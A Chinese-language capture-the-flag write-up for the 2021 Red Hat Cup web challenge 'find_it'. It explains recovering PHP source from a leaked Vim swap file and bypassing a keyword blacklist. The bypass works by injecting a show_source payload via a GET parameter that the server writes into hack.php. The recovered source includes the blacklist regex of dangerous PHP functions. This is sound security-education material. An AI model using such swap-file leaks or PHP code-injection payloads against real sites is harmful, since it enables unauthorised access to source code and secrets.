Writeup 4 红帽杯 2021 Web Find_It

Writeup 4 红帽杯 2021 Web Find_It

题目信息

项目 内容
赛事 第四届红帽杯网络安全大赛
年份 2021
类别 Web
题目 find_it
考点 备份文件泄露、代码审计、正则绕过
Flag ctfhub{13c5134e53ea2f5df007221d}

解题过程

Step 1:信息收集

访问首页 → nginx 默认页。访问 /robots.txt → 提示 1ndexx.php。

Step 2:入口识别

直接访问 /1ndexx.php → 404 Not Found 。这是一个烟雾弹,真正的入口是 /index.php(Web 服务器默认首页)。

Step 3:备份文件泄露

尝试 Vim 的 .swp 交换文件:

http 复制代码
http://challenge-8901e8931c687cd1.sandbox.ctfhub.com:10800/.1ndexx.php.swp

成功下载,获得源码:

php 复制代码
<?php $link = mysql_connect('localhost', 'ctfhub', 'ctfhub'); ?>
<html>
<head>
	<title>Hello worldd!</title>
	<style>
	body {
		background-color: white;
		text-align: center;
		padding: 50px;
		font-family: "Open Sans","Helvetica Neue",Helvetica,Arial,sans-serif;
	}

	#logo {
		margin-bottom: 40px;
	}
	</style>
</head>
<body>
	<img id="logo" src="logo.png" />
	<h1><?php echo "Hello My freind!"; ?></h1>
	<?php if($link) { ?>
		<h2>I Can't view my php files?!</h2>
	<?php } else { ?>
		<h2>MySQL Server version: <?php echo mysql_get_server_info(); ?></h2>
	<?php } ?>
</body>
</html>
<?php

#Really easy...

$file=fopen("flag.php","r") or die("Unable 2 open!");

$I_know_you_wanna_but_i_will_not_give_you_hhh = fread($file,filesize("flag.php"));


$hack=fopen("hack.php","w") or die("Unable 2 open");

$a=$_GET['code'];

if(preg_match('/system|eval|exec|base|compress|chr|ord|str|replace|pack|assert|preg|replace|create|function|call|\~|\^|\`|flag|cat|tac|more|tail|echo|require|include|proc|open|read|shell|file|put|get|contents|dir|link|dl|var|dump/',$a)){
	die("you die");
}
if(strlen($a)>33){
	die("nonono.");
}
fwrite($hack,$a);
fwrite($hack,$I_know_you_wanna_but_i_will_not_give_you_hhh);

fclose($file);
fclose($hack);
?>

Step 4:代码审计

php 复制代码
$file = fopen("flag.php", "r");
$I_know_you_wanna_but_i_will_not_give_you_hhh = fread($file, filesize("flag.php"));
$hack = fopen("hack.php", "w");
$a = $_GET['code'];
// 黑名单过滤:system|eval|exec|...|flag|cat|...|file|get|contents|...
if(preg_match('/.../', $a)) { die("you die"); }
if(strlen($a) > 33) { die("nonono."); }
fwrite($hack, $a);
fwrite($hack, $I_know_you_wanna_but_i_will_not_give_you_hhh);

关键发现:

flag 内容会被追加写入 hack.php。

Step 5:构造 Payload

show_source 不在黑名单中,且长度 31 < 33:

注入:/index.php?code=<?php show_source(__FILE__); ?>

http 复制代码
http://challenge-8901e8931c687cd1.sandbox.ctfhub.com:10800/index.php?code=%3C%3Fphp%20show_source(__FILE__)%3B%20%3F%3E

页面显示:

Step 6:获取 Flag

接着访问:/hack.php

http 复制代码
http://challenge-8901e8931c687cd1.sandbox.ctfhub.com:10800/hack.php

页面高亮显示源码,暴露 flag:

php 复制代码
 <?php show_source(__FILE__); ?><?php
$flag = "ctfhub{13c5134e53ea2f5df007221d}";
?> 

Flag:

复制代码
ctfhub{13c5134e53ea2f5df007221d}

知识点总结

知识点 说明
robots.txt 烟雾弹 提示的文件名可能是假名,真入口是 index.php
Vim swap 文件机制 编辑时自动生成 .filename.swp,正常退出删除,异常退出保留
swap 文件泄露 存储在 Web 目录时,可通过 URL 直接下载源码
命名规则 .filename.swp → .filename.swo → .filename.swn
代码审计突破 flag 被写入 hack.php,用 show_source(__FILE__) 显示自身源码
黑名单绕过 show_source 含 source 但不含黑名单词 file

Rambo

2026年10月03日

🎉🎉🎉

相关推荐
hengdonghui20 小时前
Writeup 4 强网杯 2019 强网先锋打野
ctf·misc·zsteg
hengdonghui1 天前
Writeup 4 NUAA 2017 robots
android·ctf·re
hengdonghui1 天前
Writeup 4 CSS CTF Semester 2 2026 - Lamp Drill
ctf·re
hengdonghui2 天前
Writeup 4 CSS CTF Semester 2 2026 Cryptography Chrono I
ctf·维吉尼亚密码·crypto
熊猫钓鱼>_>2 天前
MetaAI深度研究研究报告
ai·meta·大模型·llm·agent·web·metaai
hengdonghui2 天前
Writeup 4 CSS CTF Semester 2 2026 - Dead Faction Servers
ctf·osint
hengdonghui3 天前
Writeup 4 2020 - 之江杯 - 工控现场的恶意扫描
wireshark·ctf·流量分析
hengdonghui4 天前
Writeup 4 2020 - 之江杯 - 异常的工程文件
ctf·工控
hengdonghui4 天前
Writeup 4 2020 - 之江杯 - 注册表分析
注册表·ctf